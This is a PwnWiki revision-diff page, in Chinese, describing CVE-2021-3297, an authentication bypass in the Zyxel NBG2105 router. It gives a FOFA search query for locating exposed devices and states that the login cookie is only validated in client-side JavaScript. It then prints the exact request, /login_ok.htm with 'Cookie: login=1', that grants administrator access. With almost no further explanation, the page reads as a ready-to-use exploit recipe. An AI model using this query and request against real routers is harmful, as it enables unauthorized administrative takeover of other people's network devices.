Difference between revisions of "CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Zyxel NBG2105 </pre> ==FOFA== <pre> app="ZyXEL-NBG2105" </pre> 800px...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 18: | Line 18: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
其中前端文件 <code>/js/util_gw.js</code> 存在前端對 <code>Cookie login</code>參數的校驗。 | 其中前端文件 <code>/js/util_gw.js</code> 存在前端對 <code>Cookie login</code>參數的校驗。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
請求如下則會以管理員身份跳轉到 <code>home.htm</code>頁面。 | 請求如下則會以管理員身份跳轉到 <code>home.htm</code>頁面。 | ||
</translate> | </translate> | ||
Latest revision as of 09:46, 6 April 2021
漏洞影響
Zyxel NBG2105
FOFA
app="ZyXEL-NBG2105"
其中前端文件 /js/util_gw.js 存在前端對 Cookie login參數的校驗。
請求如下則會以管理員身份跳轉到 home.htm頁面。
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;
